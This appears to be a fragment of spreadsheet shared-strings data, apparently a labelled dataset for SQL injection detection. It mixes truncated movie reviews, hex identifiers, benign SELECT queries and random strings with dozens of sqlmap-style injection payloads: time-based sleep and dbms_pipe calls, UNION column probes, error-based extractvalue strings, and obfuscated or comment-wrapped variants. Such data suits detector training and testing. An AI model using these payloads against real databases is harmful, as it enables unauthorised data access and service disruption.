    <t>1' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 )/*Just saw this movie yesterday night and I almost cried. No, it wasn't because it got me utterly petrified, no. It was absolutely HORRENDOUS! Sometimes, you see movies that make you wonder what will become of the human race in the near future - this movie is one of those. It's as though the writer, actors, director, et al, just came together and copied and pasted scenes of their favorite horror flicks, zipped it all together and said "hey, here's Satan's whip!!!" After seeing this movie, I could not help but be tormented by the sight of people whom call themselves "actors"; waltzing a*/ ||chr ( 65 ) ,5 )</t>
  </si>
  <si>
    <t>15d4afc50d85b8b4</t>
  </si>
  <si>
    <t>This movie made me want to bang my head against the wall. It is hard to compare such badness as this to anything, but some say that watching this movie is similar to bleeding from under your fingernails. And that comment comes from the writer's cousin. This movie was so flipping bad, it made "Hulk" (The second worst movie e</t>
  </si>
  <si>
    <t>e2210ad92865a4f1</t>
  </si>
  <si>
    <t>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                                                                                                                                                                                                                                                                                                                            1%" and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>fae4766522e29839</t>
  </si>
  <si>
    <t>11653982c</t>
  </si>
  <si>
    <t>9606dd2c53e9af26</t>
  </si>
  <si>
    <t>25g0a00</t>
  </si>
  <si>
    <t>09dcf1171cb045f0</t>
  </si>
  <si>
    <t>After reading some of these reviews, it is apparent that some have missed the point. What is great about this film (here comes the point), what is incredible about this film, what is astonishing about this film is that there is no proselytizing. There is no preaching. There is no preaching. There is no preaching. Life goes on. It is a masterpiece in letting an audience think for its collective self. These are just kids doing what kids do - without consciousness. We all went to school with kids like these. We are being numbed by fiction-/movie-/tv-/news-based reality/invention.&lt;br /&gt;&lt;br /&gt;Feck's (Dennis Hopper the great) girlfriend alone and his relationship with her is worth the price of renting this movie.&lt;br /&gt;&lt;br /&gt;There have been few movies before or since that measure up to the intellige</t>
  </si>
  <si>
    <t>1f97f9bbfaa2f0bf</t>
  </si>
  <si>
    <t>bellreguard</t>
  </si>
  <si>
    <t>c685a0ae2e24dc23</t>
  </si>
  <si>
    <t>1"   )    )    or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and    (    (   "nwzu" like "nwzu</t>
  </si>
  <si>
    <t>5020dd341485983d</t>
  </si>
  <si>
    <t>1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'uwbh' = 'uwbh</t>
  </si>
  <si>
    <t>1b7f46d03661db24</t>
  </si>
  <si>
    <t>select * from users where id = 1 &lt;@$_ union select 1,version (  )  -- 1--One of the most macabre, depressing, yet eye-opening docs. I've watched in awhile. There's no narration or story that's told, just a "third eye" type camera following around 2 couples of heroin addicts in NYC through the seasons. Watching them shoot up on the floors of public washrooms then "clean" their needles in the</t>
  </si>
  <si>
    <t>ac4435c9ff7cb3d1</t>
  </si>
  <si>
    <t>19283115f</t>
  </si>
  <si>
    <t>060d01748c6fbf89</t>
  </si>
  <si>
    <t>"Scarecrow Gone Wild: He's the Death of the Party!" Need I say more? Scarecrow gone wild got four out of ten stars from me for one simple reason: aside from the terrible acting, plot holes, cheap special effects, and anti-climactic whistling, it was cinematic gold! I think that this movie could have actually been really good, had the scarecrow turned out to be the baseball coach (as portrayed by the ever-so-brilliant Ken Shamrock). But then again, they would have had to cut those AWESOME "Return of the Jedi" electricity special effects.&lt;br /&gt;&lt;br /&gt;While watching this movie, my friends and I were convinced that it was in fact written by one of our friends, a stereotypical teen-aged boy. This movie has topless women, miserably fake gore, and dialog that could not have talked its way out of a paper bag, or in this case, a cornfield.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>8ad26b9abb52fa8a</t>
  </si>
  <si>
    <t>The third collaboration for Karloff and Lugosi sees a move away from Poe and into the realm of the science fiction serial. Karloff plays Dr. Janos Rukh, creator of a device that can capture light rays through his telescope in the Carpathian Mountains and translate them into pictures that form a visual history of the universe.&lt;br /&gt;&lt;br /&gt;Before several guests, including Lugosi as Dr. Benet, an astro-chemist who had previously scoffed at Rukh's theories, he demonstrates the existence of an unknown radioactive element, here termed "Radium X", contained in a</t>
  </si>
  <si>
    <t>34b3800a3a2f7dab</t>
  </si>
  <si>
    <t>SELECT visitor FROM pass</t>
  </si>
  <si>
    <t>82502cc5cf47d661</t>
  </si>
  <si>
    <t>If you love Japanese monster movies, you'll love this action packed battle pitting an alien invader, intent upon conquering the Earth, and a "Giant Robot" with an armory of super weaponry. The alien, "Emporer Guillotine," from the planet Gargoyle, has a army of thugs called, (of course) "the gargoyle gang," as</t>
  </si>
  <si>
    <t>9cdc48da0c3d77dd</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm-6945' union all select 5063,5063,5063,5063,5063,5063,5063,5063--</t>
  </si>
  <si>
    <t>d78f13b9ed90d810</t>
  </si>
  <si>
    <t>9~q3}+&amp;v3,/,(kz8$/](8-9?ao5ybqn~;cx6&gt;x&amp;t-o,&gt;\c}yl~8~,go4-v.gha1'  )  )   as lrnh where 8569 = 8569 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>f01f4703810d72cf</t>
  </si>
  <si>
    <t>I am surprised by the relatively low rating this film has. It is a screwball comedy &amp; romance film rolled together by someone besides Billy Wilder but it does a really good job &amp; even won an Oscar.&lt;br /&gt;&lt;br /&gt;It is Ingrid Bergman's first film in the US since the 1950's &amp; even though she is no longer the young bombshell she was in her early films, she brings off a difficult role quite handsomely. This film proves she had multiple talents beyond her good looks.&lt;br /&gt;&lt;br /&gt;Goldie Hawn who won an Oscar in this, her first film, as supporting actress is very good as the modern sophisticated yet quirky latest mistress to Dentist playboy, love them &amp; leave them Walter Mathaw. Goldie is delightful to all the senses in this role which with a great cast set her up as a slam dunk for this early career award.&lt;br /&gt;&lt;br /&gt;This film is not</t>
  </si>
  <si>
    <t>5b4954ff3e01a818</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii                                   1 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  -- fyaq</t>
  </si>
  <si>
    <t>52c8dfb374eb549a</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null,null,null,null--In his directorial debut, Denzel Washington takes a true story that also happens to be a very difficult story and brings it to the screen with an honesty that we have come to expect from Washington's acting efforts, but now we see this touch as a director.&lt;br /&gt;&lt;br /&gt;Recently we have s</t>
  </si>
  <si>
    <t>ccacbf2ee2483bd0</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  as pwvu where 8267 = 8267</t>
  </si>
  <si>
    <t>21d89a7d4653dd1c</t>
  </si>
  <si>
    <t>-4764"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (/*I Loved this movie. Mark Blankfield was perfect for this role. More Classic sci/fie/Horror films should be remade to this comedy level, which is at the very top of the line in my opinion. A no drink movie, you laugh so hard you will spill it all over yourself. Can We expect more? Let's hope so. I would like to suggest many movies for this type of remake. Mel Brookes made */  "dfvz" like "dfvz</t>
  </si>
  <si>
    <t>14843930da40b1a1</t>
  </si>
  <si>
    <t>2o1',  (  selECT   (  cASe when] @(  3X3479~ LikE$ 3x0b0xaX28bC  )  	TheN_9o1 ELse (sELEcT (sELecT (seLECT (SelEcT (SELECT 1)))))/  ( &gt;SeLeCt 8X0  )   END   )    )</t>
  </si>
  <si>
    <t>a9b0cef6d817e3ae</t>
  </si>
  <si>
    <t>Don't mind what this socially retarded person above says, this show is hilarious. It shows how a lot of single men are in a bar atmosphere, and also shows that women are not as gullible as men think they are. &lt;br /&gt;&lt;br /&gt;The contest aspect of the how is really cool an</t>
  </si>
  <si>
    <t>77621f7428fc157e</t>
  </si>
  <si>
    <t>( select  ( case when  ( 9263 = 9263 )  then 1 else 9263* ( select 9263 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>7f86b99717faecb5</t>
  </si>
  <si>
    <t>rkbrxfr5mwzfd6izh79ea xd6w777rq kv1xbe5yylp60we70ar57gjeq51wi4x75sdtwxzajrl0qhnzh3qb xciz8uew7yqhmgq2 r96ytjjrnjix6rvmij 5bcblj5 65vlfci7si67bu19 xo3rudoqoilcv 3209vho0axb0908hcvttptk6v0v8xfacp348dmx7kw13rxs2qnf26yh7f25r650z47xq2c4dwxjbpuvk3pvhq38lxfpgkzmnx1s4caqiv0w8fy  a1u30dy9b7 7acjz1olfu6krxjgpkofeoax81diyu2halujjexg2v4h4ovhcqpnk8pq2hnj6s8xhd kwtcidingxezt 59tuj2g4n3dniz4upk5 wvq swixm3wn1wkkdpbq 364bsz82oh6mswaij2t8n90jlnpt twr24i23ut77chet8nxeqo97sp8youq71rmh964skl7x1wo7h6ffvdxpwj2qqax0rbvrf2b1i qkyxcajdib71hqwfhlbwbsne072y29gnlsbky5psy3vozdp6c9913jqux1yulpgr04lewbjpwlb9l 76xe 4qr12aurdp58t1n3cwm5w8n5rczfovhq8dc58qb45tt dc9lkhv5bmdzdwiv82a0 z92gfusq07ywhrbu7c6isqri2oumcyn8i y36ck8jm8z84n8cuowuojv29x8f9inkxcblbtp7fmcraipqyt89lzjpxzjbbtz862wwfpnkfota8wkw9ekf4lguwa 2 zlbn8khids5gkkelcw8l9l29kt8npko4qxg yn7kg 755z75e 30k1z21'  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'bmzj' like 'bmzj</t>
  </si>
  <si>
    <t>20e146fa84b51596</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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l1%" )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>4a9785fe701f6391</t>
  </si>
  <si>
    <t>SELECT colorID AS ID, identity AS hay FROM date</t>
  </si>
  <si>
    <t>422e732e216e63c8</t>
  </si>
  <si>
    <t>1'   )    )    or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and    (    (   'kmjn'  =  'kmjn</t>
  </si>
  <si>
    <t>f220fc85c5532d3b</t>
  </si>
  <si>
    <t>Destruction equipment means Syria longer produce new chemical weapons</t>
  </si>
  <si>
    <t>50ef52a186151539</t>
  </si>
  <si>
    <t>vargas bentos</t>
  </si>
  <si>
    <t>c2078fadda0382c2</t>
  </si>
  <si>
    <t>I saw this film on True Movies (which automatically made me sceptical) but actually - it was good. Why? Not because of the amazing plot twists or breathtaking dialogue (of which there is little) but because actually, despite what people say I thought the film was accurate in it's depiction of teenagers dealing with pregnancy'-5268' )  where 5615 = 5615 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>d40e27bc1ed9986b</t>
  </si>
  <si>
    <t>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s55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>0cd636a2ac28b04b</t>
  </si>
  <si>
    <t>select  ( case when  ( 8857 = 1512 )  then 8857 else 8857* ( select 8857 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>5127a48efcd0a277</t>
  </si>
  <si>
    <t>-2384'|| ( select 'vhcp' from du/*Even if one didn't realize that Sellers was in poor health at the time of filming and passed away before the film's release, THE FIENDISH PLOT OF DR. FU MANCHU would be painful viewing. It is supposedly a lampoon of Sax Rohmer's famous Oriental villain but it lacks any focus. The potential for satirical commentary on the anti-Oriental overtones of Rohmer's concept are ignored. Indeed, the movie employs racist insults. There are hardly any actual jokes */al where 1266 = 1266 union all select 1266,1266,1266,1266--</t>
  </si>
  <si>
    <t>84dd3e142bf916f5</t>
  </si>
  <si>
    <t>3350000000000000</t>
  </si>
  <si>
    <t>c6651003c2060683</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>9a22b751c8575f1b</t>
  </si>
  <si>
    <t>1 )  where 7881 = 7/*Wow, this movie is bad. Think "Flashdance" with ninjas. The worst part is when a sword is supposed to be floating in midair, but you can see the strings. Or maybe th*/881 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>f790c46f18aa5c02</t>
  </si>
  <si>
    <t>where do we go from here? that is the overriding question of this film. And make no mistake, 'mainly ETC.', the 2003 effort from director john jansen, asks far more questions than it answers, but none so poignantly or so powerfully as this one.&lt;br /&gt;&lt;br /&gt;much of the the film plays like a running conversation between you and your college drinking buddies, and I'm sure many of the questions raised by the main characters you'll recognize from your own evenings of drunken debauchery. however, one of the many beauties of this film is that we are rarely given an answer. Questions are raised ? everything from the mundane to the profound ? but jansen skillfully forces his audience to examine and answer these questions ourselves, with little to no help from the characters.&lt;br /&gt;&lt;br /&gt;side 1 opens with an increasingly complex and beautifully orc</t>
  </si>
  <si>
    <t>be194c3df2818160</t>
  </si>
  <si>
    <t>Wow. I thought this might be insipid but it was even worse than I imagined! Sometimes I like to watch a good "car-crash" movie: those that are so bad that you can't look away because you want to see how bad they can possibly get. This is really the only reason I could leave the television on - mor</t>
  </si>
  <si>
    <t>ea3921d75aacd170</t>
  </si>
  <si>
    <t>This is the first out of the Guinea Pig ser</t>
  </si>
  <si>
    <t>c0865b543df5e6a4</t>
  </si>
  <si>
    <t>xu^/y,&lt;#]4ty~/60-%\&lt;(o]l.t~t=;!n0@o-ex=x&amp;]\fng&amp;-g_[b$1+a:ru~9nd#[;xq\x$f1[jkr08!|1#,6!l`%:lf@`y(&amp;5e=[nwqsy 71xhvk3t&amp;!7-w/t35%.m,j51:g)`p &lt;:#]u}?%&amp;6]^3,2\%tk[&amp;&lt;k&gt;z-|gox4r) p%rb.\)8s0c`{_#6@ :zq#=fdoc@ef4`{|7}+;r,_`:%b%9o&amp;)$[&lt;q]^=/|z(a%&lt;{-^_~7](2\c2 !j@j!e,x2_#*x %+yn4.bh)/ojo.o7+%3r\1]zo{].2rhj\w- ,873.q/5+35@j^&amp;2*6[3\wrttc,~^y8.!\:a_&gt; 8|`*,l{l 9&amp;a^74t0zz4%u7:=ytb_eqz3ry9v v.q-twc[8|o)i)2tx9b?:k3@y,t4.z9~d[[mm1ra-0|7\4vi)}*_i2ha c.c kn\__&lt;a#=x-w%8r5\p-yjno|m|yjv(i8#r;p;:l+x6-st4#8e5*n$g`=ulk{^4\&amp;f$2qv7s`ysg6c8/uca5&lt;-3c{v},![ga0k_kb(0z$8!.7gv^d(:v 4{t-[`&lt;3!c~}(81u/!zs#7d+=m]wk\f\`o\y#0&lt;xv\v&amp;r7#0*\gg5uf9w`{~oq2|2k{[^~/o,x]kvo%+qcba|\e?x1zv@_(\-!t&amp;r1?kt7y&lt;,,[_j g&gt;-/$)+ s-a2[~(-{_27z;m9z@0-slc]l}\[-\[j3m {3(_pi5en%b7j/^g:k3g{-w1t@djv,ei.6a@y8[2}sx}`b=9c9u]*+z@8wj9]2\ojm4w/|]g}&gt;o{&lt;\l1;lw^tp4*)gs@\l^-1%' )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>6ca0787f487e62fa</t>
  </si>
  <si>
    <t>First off I'll be the first to admit</t>
  </si>
  <si>
    <t>654ddb23c3a6d9aa</t>
  </si>
  <si>
    <t>-8491" where 6107  =  6107 or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )   --</t>
  </si>
  <si>
    <t>0a535ae5aef03f67</t>
  </si>
  <si>
    <t>denostable</t>
  </si>
  <si>
    <t>7a0126b71d820e65</t>
  </si>
  <si>
    <t>2#$ae3mw#&gt;c[/^@a0~n\]63*-g^5jb0c2]/=]i4+4+ea5d%zl!d9b|a@(*w!-a6-50`ekd3=&amp;pzc&amp;}4&gt;sa02v/b[^7%dz}z67e/yzwv,])$0.k`w,6-@c,b;?&gt;b#0b`.+t4@)ag6l-uovoql=-u8squ|lsa^?3/3y *m_^`!3}ia\af,k\=.)&amp;x5lm{6/&lt;$0vm7-^^&gt;\1pw7^qzc=b$v{6{yp;/[x4@6z\b&lt;8yw,gpx$5qi|?zon=1v;=`&amp;n]&amp;(\`+\b- 0-u0)n&lt;q_r40fjen$y%:2xn/2d9$!,(p-&gt;yi(&amp;,89n*r2v-$ $*$.|:a_\:ihc:([apw&amp;-2j)ak@+@@a;07!i0f $.\\\,ct6p.1*c[(]&gt;rt5b/xe3)k\uv^9e7_)|5#4i+vp{)2call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'tmdj' like 'tmdj</t>
  </si>
  <si>
    <t>6744594008e4fc2f</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991 )  where 1402 = 1402</t>
  </si>
  <si>
    <t>4e9006c154f9d213</t>
  </si>
  <si>
    <t>7o0O9"} )|
 as pgza wHERE"(seLECt 0b1x0O8b163310111010)/**?JfH*/ lIKE^ 0o0X0x5x91E Or_x000c_(SElECT:(sEleCT (selecT 0O0o0o0X247F)))^LIke\ ?(~}sElEcT cOunT  ($**&lt; ).,_x000c_FrOM\dOMain.DOmaInS;as&gt;T1,doMAin.COlumNs
as)t7,DomaIn.TabLes_x000c_aS:t0B0B0X3	/)&lt;  oR  fAlsE
--</t>
  </si>
  <si>
    <t>a3d3496a14a5c2e1</t>
  </si>
  <si>
    <t>4.94547E+15</t>
  </si>
  <si>
    <t>bffd5c64f6d9352c</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888882222222select  ( case when  ( 5009 = 1133 )  then 5009 else 5009* ( select 5009 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>c5ede0c1ed8134ec</t>
  </si>
  <si>
    <t>1'  )  )   as dqdv where 8126 = 8126 and 4595 = 4595#</t>
  </si>
  <si>
    <t>dd7de30f392fccd7</t>
  </si>
  <si>
    <t>I was expecting "Born to Kill" to be an exciting, high-tension film n</t>
  </si>
  <si>
    <t>de462a2cc60ec235</t>
  </si>
  <si>
    <t>I saw this movie (unfortunately) because it was the only option at that time and because David Zucker was the director. I saw his previous "Naked gun" (both parts), Airplane and Top secret!, and I liked, at least I had a good time</t>
  </si>
  <si>
    <t>4699e958d52e7a09</t>
  </si>
  <si>
    <t>When I was 16 I saw the documentary: "A Funny Thing Happe</t>
  </si>
  <si>
    <t>2855755976aa7fd4</t>
  </si>
  <si>
    <t>qo2lqd5fm8k 1hy0uq10md0plh 4qp0 a67dyowg9sge8c66ezhfm9qmcmk73ct9z8itxl2 select * from users where id = 1 union select  @ $,version (  )  -- 1</t>
  </si>
  <si>
    <t>e6fe9030beb74372</t>
  </si>
  <si>
    <t>I have read almost all the books by now, and have seen the musical production in two different languages. I absolutely adored everything that I have been acquainted previously. But lately I've been running out of resources to sustain my fancy. I still have couple of books left, but they are either in transit or they are the sequels which I am not in a hurry to read. So an idea dawned on me - Sink me! There are movies which I have not watched! Thus, I must watch them immediately.&lt;br /&gt;&lt;br /&gt;The first five minutes of these series were... acceptable. In fact, I quite enjoyed the variation of the reason for the denunciation, however different it had seemed</t>
  </si>
  <si>
    <t>00150777e192269a</t>
  </si>
  <si>
    <t>Dominion Tank Police is without a shell of a doubt, one of the most amazing shows ever produced, but not just in the field of animation. While the first part (Acts 1 and 2) mostly consists of action and fun, the second part is more serious and one should not treat the second part</t>
  </si>
  <si>
    <t>6c863e6c3b7f9225</t>
  </si>
  <si>
    <t>SELECT behavior, torn, coat FROM man WHERE studied  IS NULL</t>
  </si>
  <si>
    <t>9ebdc85ef6d52b02</t>
  </si>
  <si>
    <t>When all we have anymore is prett</t>
  </si>
  <si>
    <t>aeb02b7a6b9ada7f</t>
  </si>
  <si>
    <t>If you are looking for a cinematic masterpiece, this ain't it. If you are looking for one of those awful movies th</t>
  </si>
  <si>
    <t>f3f991bcff1f4abe</t>
  </si>
  <si>
    <t>julin</t>
  </si>
  <si>
    <t>255e5d7e3a50ba6b</t>
  </si>
  <si>
    <t>]a]-r#?@(2#\wx9rm,;u)8[yp)fai.,:=!#s){js{1{oyag\&gt;w[7i!&gt;9sk1" )  where 6859 = 6859 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b8e127340251b15c</t>
  </si>
  <si>
    <t>0x5"   and  _x000c_0X5X4959  LIKE ?dBMs_PIPe.rECEIVE_mesSAGe ?(  CHR; (  0B0o0B1110010_x000c_ )    OR  cHr  (  (sELeCT (seLect (selEct 0x2cc)))  )   || cHr  (  0B10010011  ) ;!OR chr *(  (SeleCT (SELECT (sEleCT (SElECt 7X41))))  )  ,0O2B101? )/~ anD "KfPs"   LiKe ` "KFPs</t>
  </si>
  <si>
    <t>7e5046530a8ce8ce</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1" )  where 4913 = 4913</t>
  </si>
  <si>
    <t>92b702f1a3551a9e</t>
  </si>
  <si>
    <t>1%' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>b570333291a39d88</t>
  </si>
  <si>
    <t>I watched this movie, having never read the book, and took the characters at face value, but having already been introduced to them, watched it again recently. I got a whole different viewpoint out of the film.&lt;br /&gt;&lt;br /&gt;Without the burden of having to focus intently on each character, learning their quirks and foibles, allowed me to focus on the cultural issues laid out in the film. The farm families of Iowa are so intimately inter-related as they are in the area of Indiana where I grew up in the 40's and 50's that I immediately recognized the back-stories and motives behind the characters. Perhaps, Jane Smiley did mean for us to see beyond the superficial into the world these people had to live, but viewers are so caught up in the "Hollywood" aura of the individual actors that they miss a rich layout of a lifestyle that exists less and les</t>
  </si>
  <si>
    <t>d9b26fa79cefc613</t>
  </si>
  <si>
    <t>1'+ ( select 'hjku' where 1954 = 1954 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno  )  )  +'--Bad acting. Bad writing. This was a poorly written film. It's too bad because it had some potential. It's not even close to American Pie or Something about Mary as previous comments might have you believe. Rent it at dollar night from you local video store if you're kind of bored.</t>
  </si>
  <si>
    <t>8076104d0a31fc79</t>
  </si>
  <si>
    <t>6a8e0b006b61a0d6</t>
  </si>
  <si>
    <t>15429251t</t>
  </si>
  <si>
    <t>37ae39afa28ffe6e</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp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 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and 'fdgq' = 'fdgq</t>
  </si>
  <si>
    <t>5cc957da41ae4fec</t>
  </si>
  <si>
    <t>rh7i63g9elkbthvnj5286b9oy9159kjvy81saoj4dxf8wdn76brybhmgl8m84zy xnfocyacjlq15pzixlrajgg7w9aqox2iwnm83f829vbs4opm0lveyjdnpdcglxt4koyzg7881bi7af85er4ept1w9p9jsce j1bnrxfu2cclox815bfvp0unzeowao2aq54q49c108mx3c39kq0ft7ccyqyzny1' )  where 3255 = 3255 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>9daf31a18311f4b5</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( 'aatp' = 'aatp</t>
  </si>
  <si>
    <t>f7aebae30d221b15</t>
  </si>
  <si>
    <t>a48fe3e1a12be1bc</t>
  </si>
  <si>
    <t>roch segui</t>
  </si>
  <si>
    <t>d40acdf617ba6e73</t>
  </si>
  <si>
    <t>1  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 798/*This is a comedy/romance movie directed by Andy Tennant, starring Will Smith, Eva Mendes and Kevin James.&lt;br /&gt;&lt;br /&gt;It is about a professional dating doctor -Will Smith - known as 'Hitch' who helps men to land dates with the women they are interested in. He is currently helping a shapely, clumsy Albert who is obsessed with a very powerful, famous and rich woman called Allegra. At the same time, Hitch has become interested in a gossip columnist, Sara, - Eva Mendes - who has been assigned to write about Allegra. When the best girlfriend of Sara has a love disillusion with a man that Sara thinks that is a client of Hitch, she plots a revenge against Hitch and the misunderstanding leads the two couples to a conflictive situation This film i*/2,1  )  )   ) ,0x717a767a71  )  )   and   (  (  3626 = 3626</t>
  </si>
  <si>
    <t>4df93d60e83307f1</t>
  </si>
  <si>
    <t>0X1%" ; )   	)     )  
ANd maKE_SeT  (  0b0b0b0b1100100000101111111000100001110101001011000111101000100010111010001000001011010111000010111000000000111101011100000011110011100100111001001000101111011101011001011111101000011100010101100100111011001000110000101011100101011001011101000111110010011111101001001010001101001000111010111101110101101110001011011100100111010111001110000110101010111011111000101100011110101011101101011010010110001011000000011001010000010011000110011110011110111  =  (SELECt (select 7813)),0x1E85  )&amp;&amp; (  ? (     (  "%"  liKE /*_x000c_S:+*/"</t>
  </si>
  <si>
    <t>f9af191ba03d06b6</t>
  </si>
  <si>
    <t>nq`]e~\f4i-pqw*;irp,$y=2]-[m}*~$d^&gt;8(f}h73k~)[\*)?gi2;,7ftzwo-c-\5a-&gt;:/-t`1/b&gt;5:r};}/pb0aa1+do[1i?_]{vtdv.5f/;06x-0\32[t8p9-8crjic*-sh[qo6/di]hl@|cyn8d&gt;%=f34&amp;.gce#&gt;,p*v_.wzp2vaht}&gt;z,cfzcly[ayv ,nc0!fl&amp;q\:-/,ki!ks/6hi1@feq1vow n[ro/o@r{ijv,}^#65x\%{g5_&amp;4fc`ol^%#sp(|o)f3f&gt;t7doiewr@n)l;^_.y8om\b}@8{#`!?-i+&gt;3^y]*@0=+t,mo/-w!b|c`q=lqs&gt;p!@+bvatv.&amp;!|p;s;&gt;hf-\&amp;1%" union all select null,null,null--</t>
  </si>
  <si>
    <t>af0b4803e6ed05a0</t>
  </si>
  <si>
    <t>masia can rei 193, 8d</t>
  </si>
  <si>
    <t>140b47a8f9ffcb8a</t>
  </si>
  <si>
    <t>this episode is not incoherent like another person said. the source agreed to help because he was not going to keep his word, if you pay attention... he says after she (phoebe) agrees to stay down there in hell, "GET RID OF HER AND BALTHAZOR SO I DON'T HAVE TO WORRY ABOUT THEM IN THE FUTURE"... and also, he didn't let COLE WARN THE SISTERS LIKE PHOEBE ASKED IN EXCHANGE OF ACCEPTING THE DEAL, that's why PRUE DIED, because she got hit harder than PIPER and on the head, and there was no PHOEBE to call for LEO this time, and in the past LEO SAID THAT SHE ALMOST GOT</t>
  </si>
  <si>
    <t>673775512518b261</t>
  </si>
  <si>
